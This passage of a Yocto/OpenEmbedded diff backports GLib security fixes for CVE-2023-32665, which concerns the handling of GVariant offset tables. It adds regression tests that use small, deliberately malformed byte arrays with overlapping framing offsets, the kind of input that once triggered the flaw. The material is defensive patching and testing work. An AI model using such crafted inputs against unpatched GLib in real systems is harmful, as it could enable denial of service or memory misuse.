++         ^───────────────────┘
++
++    ^^^^^^^^^^                   1st yy
++          ^^^^^^^^^^             2nd yy
++                ^^^^^^^^^^       3rd yy
++                            ^^^^ Framing offsets
++     */
++
++  /* If this variant was encoded normally, it would be something like this:
++   * 0x12, 0x34,  pad,  pad, [array bytes], 0x56, 0x78,  pad,  pad, [array bytes], 0x9A, 0xBC, 0xXX
++   *                                      ^─────────────────────────────────────────────────────┘
++   *
++   * ^^^^^^^^^^                                                                                     1st yy
++   *                                        ^^^^^^^^^^                                              2nd yy
++   *                                                                               ^^^^^^^^^^       3rd yy
++   *                                                                                           ^^^^ Framing offsets
++   */
++  };
++  gsize size = sizeof (data);
++  GVariant *variant = NULL;
++  GVariant *normal_variant = NULL;
++  GVariant *expected = NULL;
++
++  variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++  g_assert_nonnull (variant);
++
++  normal_variant = g_variant_get_normal_form (variant);
++  g_assert_nonnull (normal_variant);
++  g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++  expected = g_variant_new_parsed (
++      "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
++  g_assert_cmpvariant (expected, variant);
++  g_assert_cmpvariant (expected, normal_variant);
++
++  g_variant_unref (expected);
++  g_variant_unref (normal_variant);
++  g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets3 (void)
++{
++  /* The expected decoding of this non-normal byte stream is complex. See
++   * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++   * specification.
++   *
++   * The rule “Child Values Overlapping Framing Offsets� from the specification
++   * says that the first `ay` must be decoded as `[0x01]` even though it
++   * overlaps the first byte of the offset table. However, since commit
++   * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++   * this as it’s exploitable. So the first `ay` must be given a default value.
++   *
++   * The second and third `ay`s must be given default values because of rule
++   * “End Boundary Precedes Start Boundary�.
++   *
++   * The `i` must be given a default value because of rule “Start or End
++   * Boundary of a Child Falls Outside the Container�.
++   */
++  const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
++  const guint8 data[] = {
++    0x01, 0x00, 0x02,
++    /*
++               ^──┘
++
++    ^^^^^^^^^^                   1st ay, bytes 0-2 (but given a default value anyway, see above)
++                                 2nd ay, bytes 2-0
++                                     i,  bytes 0-4
++                                 3rd ay, bytes 4-1
++          ^^^^^^^^^^ Framing offsets
++     */
++  };
++  gsize size = sizeof (data);
++  GVariant *variant = NULL;
++  GVariant *normal_variant = NULL;
++  GVariant *expected = NULL;
++
++  variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++  g_assert_nonnull (variant);
++
++  g_assert_false (g_variant_is_normal_form (variant));
++
++  normal_variant = g_variant_get_normal_form (variant);
++  g_assert_nonnull (normal_variant);
++  g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++  expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
++  g_assert_cmpvariant (expected, variant);
++  g_assert_cmpvariant (expected, normal_variant);
++
++  g_variant_unref (expected);
++  g_variant_unref (normal_variant);
++  g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets4 (void)
++{
++  /* The expected decoding of this non-normal byte stream is complex. See
++   * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++   * specification.
++   *
++   * The rule “Child Values Overlapping Framing Offsets� from the specification
++   * says that the first `ay` must be decoded as `[0x01]` even though it
++   * overlaps the first byte of the offset table. However, since commit
++   * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++   * this as it’s exploitable. So the first `ay` must be given a default value.
++   *
++   * The second `ay` must be given a default value because of rule “End Boundary
++   * Precedes Start Boundary�.
++   *
++   * The third `ay` must be given a default value because its framing offsets
++   * overlap that of the first `ay`.
++   */
++  const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
++  const guint8 data[] = {
++    0x01, 0x00, 0x02,
++    /*
++               ^──┘
++
++    ^^^^^^^^^^                   1st ay, bytes 0-2 (but given a default value anyway, see above)
++                                 2nd ay, bytes 2-0
++                                 3rd ay, bytes 0-1
++          ^^^^^^^^^^ Framing offsets
++     */
++  };
++  gsize size = sizeof (data);
++  GVariant *variant = NULL;
++  GVariant *normal_variant = NULL;
++  GVariant *expected = NULL;
++
++  variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++  g_assert_nonnull (variant);
++
++  g_assert_false (g_variant_is_normal_form (variant));
++
++  normal_variant = g_variant_get_normal_form (variant);
++  g_assert_nonnull (normal_variant);
++  g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++  expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
++  g_assert_cmpvariant (expected, variant);
++  g_assert_cmpvariant (expected, normal_variant);
++
++  g_variant_unref (expected);
++  g_variant_unref (normal_variant);
++  g_variant_unref (variant);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+  * path, ‘/’. */
+ static void
+@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
+                    test_normal_checking_array_offsets2);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+                    test_normal_checking_tuple_offsets);
++  g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
++                   test_normal_checking_tuple_offsets2);
++  g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
++                   test_normal_checking_tuple_offsets3);
++  g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
++                   test_normal_checking_tuple_offsets4);
+   g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+                    test_normal_checking_empty_object_path);
+ 
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
new file mode 100644
index 0000000000..83d0205160
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
+From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 03:42:47 +0000
+Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
+ directly
+
+This is equivalent to what `GVariantIter` does, but it means that
+`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
+calls.
+
+This will be useful in an upcoming commit, where those child values will
+be inspected a little more deeply.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 7 +++----
+ 1 file changed, 3 insertions(+), 4 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index cdb428e..fdd36be 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
+     case G_VARIANT_CLASS_VARIANT:
+       {
+         GVariantBuilder builder;
+-        GVariantIter iter;
+-        GVariant *child;
++        gsize i, n_children;
+ 
+         g_variant_builder_init (&builder, g_variant_get_type (value));
+-        g_variant_iter_init (&iter, value);
+ 
+-        while ((child = g_variant_iter_next_value (&iter)))
++        for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+           {
++            GVariant *child = g_variant_get_child_value (value, i);
+             g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
+             g_variant_unref (child);
+           }
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
new file mode 100644
index 0000000000..f098548618
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
+From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:30:38 +0000
+Subject: [PATCH] gvariant: Track checked and ordered offsets independently
+
+The past few commits introduced the concept of known-good offsets in the
+offset table (which is used for variable-width arrays and tuples).
+Good offsets are ones which are non-overlapping with all the previous
+offsets in the table.
+
+If a bad offset is encountered when indexing into the array or tuple,
+the cached known-good offset index will not be increased. In this way,
+all child variants at and beyond the first bad offset can be returned as
+default values rather than dereferencing potentially invalid data.
+
+In this case, there was no information about the fact that the indexes
+between the highest known-good index and the requested one had been
+checked already. That could lead to a pathological case where an offset
+table with an invalid first offset is repeatedly checked in full when
+trying to access higher-indexed children.
+
+Avoid that by storing the index of the highest checked offset in the
+table, as well as the index of the highest good/ordered offset.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com> 
+---
+ glib/gvariant-core.c       | 28 ++++++++++++++++++++++++
+ glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
+ glib/gvariant-serialiser.h |  9 ++++++++
+ glib/gvariant.c            |  1 +
+ glib/tests/gvariant.c      |  5 +++++
+ 5 files changed, 75 insertions(+), 12 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index b951cd9..1b9d5cc 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -67,6 +67,7 @@ struct _GVariant
+       GBytes *bytes;
+       gconstpointer data;
+       gsize ordered_offsets_up_to;
++      gsize checked_offsets_up_to;
+     } serialised;
+ 
+     struct
+@@ -182,6 +183,24 @@ struct _GVariant
+  *                             This field is only relevant for arrays of non
+  *                             fixed width types and for tuples.
+  *
++ *     .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
++ *                             the index of the highest element, n, whose frame
++ *                             offsets (and all the preceding frame offsets)
++ *                             have been checked for validity.
++ *
++ *                             It is always the case that
++ *                             .checked_offsets_up_to ≥ .ordered_offsets_up_to.
++ *
++ *                             If .checked_offsets_up_to == .ordered_offsets_up_to,
++ *                             then a bad offset has not been found so far.
++ *
++ *                             If .checked_offsets_up_to > .ordered_offsets_up_to,
++ *                             then a bad offset has been found at
++ *                             (.ordered_offsets_up_to + 1).
++ *
++ *                             This field is only relevant for arrays of non
++ *                             fixed width types and for tuples.
++ *
+  *   .tree: Only valid when the instance is in tree form.
+  *
+  *          Note that accesses from other threads could result in
+@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
+       value->size,
+       value->depth,
+       value->contents.serialised.ordered_offsets_up_to,
++      value->contents.serialised.checked_offsets_up_to,
+     };
+     return serialised;
+   }
+@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
+   serialised.data = data;
+   serialised.depth = value->depth;
+   serialised.ordered_offsets_up_to = 0;
++  serialised.checked_offsets_up_to = 0;
+ 
+   children = (gpointer *) value->contents.tree.children;
+   n_children = value->contents.tree.n_children;
+@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+   if (value->state & STATE_SERIALISED)
+     {
+       serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++      serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
+     }
+   else
+     {
+       serialised->ordered_offsets_up_to = 0;
++      serialised->checked_offsets_up_to = 0;
+     }
+ 
+   if (serialised->data)
+@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
+       value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+       value->contents.serialised.bytes = bytes;
+       value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
++      value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
+       value->state |= STATE_SERIALISED;
+     }
+ }
+@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+   serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+   serialised.depth = 0;
+   serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++  serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+ 
+   if (!g_variant_serialised_check (serialised))
+     {
+@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+     }
+ 
+   value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++  value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+ 
+   g_clear_pointer (&owned_bytes, g_bytes_unref);
+ 
+@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
+ 
+     /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
+     value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++    value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
+ 
+     /* Check whether this would cause nesting too deep. If so, return a fake
+      * child. The only situation we expect this to happen in is with a variant,
+@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
+       g_bytes_ref (value->contents.serialised.bytes);
+     child->contents.serialised.data = s_child.data;
+     child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
++    child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
+ 
+     return child;
+   }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index cd4a3e6..0bf7243 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -120,6 +120,8 @@
+  *
+  * @depth has no restrictions; the depth of a top-level serialised #GVariant is
+  * zero, and it increases for each level of nested child.
++ *
++ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
+  */
+ 
+ /* < private >
+@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
+            !(serialised.size == 0 || serialised.data != NULL))
+     return FALSE;
+ 
++  if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
++    return FALSE;
++
+   /* Depending on the native alignment requirements of the machine, the
+    * compiler will insert either 3 or 7 padding bytes after the char.
+    * This will result in the sizeof() the struct being 12 or 16.
+@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+   g_variant_type_info_ref (value.type_info);
+   value.depth++;
+   value.ordered_offsets_up_to = 0;
++  value.checked_offsets_up_to = 0;
+ 
+   return value;
+ }
+@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised        value,
+ {
+   if (n_children)
+     {
+-      GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
++      GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
+ 
+       gvs_filler (&child, children[0]);
+     }
+@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+       value.type_info = g_variant_type_info_element (value.type_info);
+       value.depth++;
+       value.ordered_offsets_up_to = 0;
++      value.checked_offsets_up_to = 0;
+ 
+       return g_variant_serialised_is_normal (value);
+     }
+@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+ 
+   value.depth++;
+   value.ordered_offsets_up_to = 0;
++  value.checked_offsets_up_to = 0;
+ 
+   return value;
+ }
+@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised        value,
+ {
+   if (n_children)
+     {
+-      GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
++      GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
+ 
+       /* write the data for the child.  */
+       gvs_filler (&child, children[0]);
+@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+   value.size--;
+   value.depth++;
+   value.ordered_offsets_up_to = 0;
++  value.checked_offsets_up_to = 0;
+ 
+   return g_variant_serialised_is_normal (value);
+ }
+@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ 
+   /* If the requested @index_ is beyond the set of indices whose framing offsets
+    * have been checked, check the remaining offsets to see whether they’re
+-   * normal (in order, no overlapping array elements). */
+-  if (index_ > value.ordered_offsets_up_to)
++   * normal (in order, no overlapping array elements).
++   *
++   * Don’t bother checking if the highest known-good offset is lower than the
++   * highest checked offset, as that means there’s an invalid element at that
++   * index, so there’s no need to check further. */
++  if (index_ > value.checked_offsets_up_to &&
++      value.ordered_offsets_up_to == value.checked_offsets_up_to)
+     {
+       switch (offsets.offset_size)
+         {
+         case 1:
+           {
+             value.ordered_offsets_up_to = find_unordered_guint8 (
+-                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++                offsets.array, value.checked_offsets_up_to, index_ + 1);
+             break;
+           }
+         case 2:
+           {
+             value.ordered_offsets_up_to = find_unordered_guint16 (
+-                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++                offsets.array, value.checked_offsets_up_to, index_ + 1);
+             break;
+           }
+         case 4:
+           {
+             value.ordered_offsets_up_to = find_unordered_guint32 (
+-                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++                offsets.array, value.checked_offsets_up_to, index_ + 1);
+             break;
+           }
+         case 8:
+           {
+             value.ordered_offsets_up_to = find_unordered_guint64 (
+-                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++                offsets.array, value.checked_offsets_up_to, index_ + 1);
+             break;
+           }
+         default:
+           /* gvs_get_offset_size() only returns maximum 8 */
+           g_assert_not_reached ();
+         }
++
++      value.checked_offsets_up_to = index_;
+     }
+ 
+   if (index_ > value.ordered_offsets_up_to)
+@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ 
+   /* All offsets have now been checked. */
+   value.ordered_offsets_up_to = G_MAXSIZE;
++  value.checked_offsets_up_to = G_MAXSIZE;
+ 
+   return TRUE;
+ }
+@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
+    * all the tuple *elements* here, not just all the framing offsets, since
+    * tuples contain a mix of elements which use framing offsets and ones which
+    * don’t. None of them are allowed to overlap. */
+-  if (index_ > value.ordered_offsets_up_to)
++  if (index_ > value.checked_offsets_up_to &&
++      value.ordered_offsets_up_to == value.checked_offsets_up_to)
+     {
+       gsize i, prev_i_end = 0;
+ 
+-      if (value.ordered_offsets_up_to > 0)
+-        gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++      if (value.checked_offsets_up_to > 0)
++        gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
+ 
+-      for (i = value.ordered_offsets_up_to; i <= index_; i++)
++      for (i = value.checked_offsets_up_to; i <= index_; i++)
+         {
+           gsize i_start, i_end;
+ 
+@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+         }
+ 
+       value.ordered_offsets_up_to = i - 1;
++      value.checked_offsets_up_to = index_;
+     }
+ 
+   if (index_ > value.ordered_offsets_up_to)
+@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ 
+   /* All element bounds have been checked above. */
+   value.ordered_offsets_up_to = G_MAXSIZE;
++  value.checked_offsets_up_to = G_MAXSIZE;
+ 
+   {
+     gsize fixed_size;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 144aec8..e132451 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -40,6 +40,15 @@ typedef struct
+    * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
+    * rather than an index into the frame offsets. */
+   gsize             ordered_offsets_up_to;
++
++  /* Similar to @ordered_offsets_up_to. This gives the index of the child element
++   * whose frame offset is the highest in the offset table which has been
++   * checked so far.
++   *
++   * This is always ≥ @ordered_offsets_up_to. It is always an element index.
++   *
++   * See documentation in gvariant-core.c for `struct GVariant` for details. */
++  gsize             checked_offsets_up_to;
+ } GVariantSerialised;
+ 
+ /* deserialisation */
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index fdd36be..f910bd4 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+       serialised.size = g_variant_get_size (trusted);
+       serialised.data = g_malloc (serialised.size);
+       serialised.ordered_offsets_up_to = G_MAXSIZE;  /* operating on the normal form */
++      serialised.checked_offsets_up_to = G_MAXSIZE;
+       g_variant_store (trusted, serialised.data);
+       g_variant_unref (trusted);
+ 
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index a84b02e..640f3c0 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
+ 
+   serialised->depth = 0;
+   serialised->ordered_offsets_up_to = 0;
++  serialised->checked_offsets_up_to = 0;
+ 
+   g_assert_true (serialised->type_info == instance->type_info);
+   g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -1453,6 +1454,7 @@ test_maybe (void)
+         serialised.size = needed_size;
+         serialised.depth = 0;
+ 	serialised.ordered_offsets_up_to = 0;
++	serialised.checked_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised,
+                                         random_instance_filler,
+@@ -1577,6 +1579,7 @@ test_array (void)
+         serialised.size = needed_size;
+         serialised.depth = 0;
+ 	serialised.ordered_offsets_up_to = 0;
++	serialised.checked_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) instances, n_children);
+@@ -1742,6 +1745,7 @@ test_tuple (void)
+         serialised.size = needed_size;
+         serialised.depth = 0;
+ 	serialised.ordered_offsets_up_to = 0;
++	serialised.checked_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) instances, n_children);
+@@ -1839,6 +1843,7 @@ test_variant (void)
+         serialised.size = needed_size;
+         serialised.depth = 0;
+ 	serialised.ordered_offsets_up_to = 0;
++	serialised.checked_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) &instance, 1);
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
new file mode 100644
index 0000000000..a523e60b91
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
+From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:39:01 +0000
+Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
+
+The following few commits will add a couple of new fields to
+`GVariantSerialised`, and they should be zero-filled by default.
+
+Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
+default in a few places.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c       |  2 +-
+ glib/tests/gvariant.c | 12 ++++++------
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index f910bd4..8ba701e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
+   if (alignment)
+     /* (potentially) contains multi-byte numeric data */
+     {
+-      GVariantSerialised serialised;
++      GVariantSerialised serialised = { 0, };
+       GVariant *trusted;
+       GBytes *bytes;
+ 
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 640f3c0..d640c81 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1446,7 +1446,7 @@ test_maybe (void)
+ 
+     for (flavour = 0; flavour < 8; flavour += alignment)
+       {
+-        GVariantSerialised serialised;
++        GVariantSerialised serialised = { 0, };
+         GVariantSerialised child;
+ 
+         serialised.type_info = type_info;
+@@ -1572,7 +1572,7 @@ test_array (void)
+ 
+     for (flavour = 0; flavour < 8; flavour += alignment)
+       {
+-        GVariantSerialised serialised;
++        GVariantSerialised serialised = { 0, };
+ 
+         serialised.type_info = array_info;
+         serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1738,7 +1738,7 @@ test_tuple (void)
+ 
+     for (flavour = 0; flavour < 8; flavour += alignment)
+       {
+-        GVariantSerialised serialised;
++        GVariantSerialised serialised = { 0, };
+ 
+         serialised.type_info = type_info;
+         serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1835,7 +1835,7 @@ test_variant (void)
+ 
+     for (flavour = 0; flavour < 8; flavour += alignment)
+       {
+-        GVariantSerialised serialised;
++        GVariantSerialised serialised = { 0, };
+         GVariantSerialised child;
+ 
+         serialised.type_info = type_info;
+@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance       *tree,
+ static void
+ test_byteswap (void)
+ {
+-  GVariantSerialised one, two;
++  GVariantSerialised one = { 0, }, two = { 0, };
+   TreeInstance *tree;
+ 
+   tree = tree_instance_new (NULL, 3);
+@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
+ static void
+ test_fuzz (gdouble *fuzziness)
+ {
+-  GVariantSerialised serialised;
++  GVariantSerialised serialised = { 0, };
+   TreeInstance *tree;
+ 
+   /* make an instance */
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 09d253fbfb..60a6b843c1 100644
--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -17,6 +17,45 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
            file://0001-meson-Run-atomics-test-on-clang-as-well.patch \
            file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
            file://tzdata-update.patch \
+           file://CVE-2020-35457.patch \
+           file://CVE-2021-27218.patch \
+           file://CVE-2021-27219-01.patch \
+           file://CVE-2021-27219-02.patch \
+           file://CVE-2021-27219-03.patch \
+           file://CVE-2021-27219-04.patch \
+           file://CVE-2021-27219-05.patch \
+           file://CVE-2021-27219-06.patch \
+           file://CVE-2021-27219-07.patch \
+           file://CVE-2021-27219-08.patch \
+           file://CVE-2021-27219-09.patch \
+           file://CVE-2021-27219-10.patch \
+           file://CVE-2021-27219-11.patch \
+           file://CVE-2021-27219-reg1-1.patch \
+           file://CVE-2021-27219-reg1-2.patch \
+           file://CVE-2021-27219-reg1-4.patch \
+           file://CVE-2021-27219-reg1-5.patch \
+           file://CVE-2021-27219-reg2-1.patch \
+           file://CVE-2021-27219-reg2-2.patch \
+           file://CVE-2021-27219-reg2-3.patch \
+           file://CVE-2021-28153-1.patch \
+           file://CVE-2021-28153-2.patch \
+           file://CVE-2021-28153-3.patch \
+           file://CVE-2021-28153-4.patch \
+           file://CVE-2021-28153-5.patch \
+           file://CVE-2023-32665-0001.patch \
+           file://CVE-2023-32665-0002.patch \
+           file://CVE-2023-32665-0003.patch \
+           file://CVE-2023-32665-0004.patch \
+           file://CVE-2023-32665-0005.patch \
+           file://CVE-2023-32665-0006.patch \
+           file://CVE-2023-32665-0007.patch \
+           file://CVE-2023-32665-0008.patch \
+           file://CVE-2023-32665-0009.patch \
+           file://CVE-2023-29499.patch \
+           file://CVE-2023-32611-0001.patch \
+           file://CVE-2023-32611-0002.patch \
+           file://CVE-2023-32643.patch \
+           file://CVE-2023-32636.patch \
            "
 
 SRC_URI_append_class-native = " file://relocate-modules.patch"
diff --git a/meta/recipes-core/glib-2.0/glib.inc b/meta/recipes-core/glib-2.0/glib.inc
index 7ebed0e5fd..1849a6e05c 100644
--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
 
 # pcre is under BSD;
 # docs/reference/COPYING is with a 'public domain'-like license!
-LICENSE = "LGPLv2.1+ & BSD & PD"
+LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
                     file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
                     file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \
@@ -32,10 +32,6 @@ inherit meson gettext gtk-doc pkgconfig ptest-gnome upstream-version-is-even bas
 
 GTKDOC_MESON_OPTION = "gtk_doc"
 
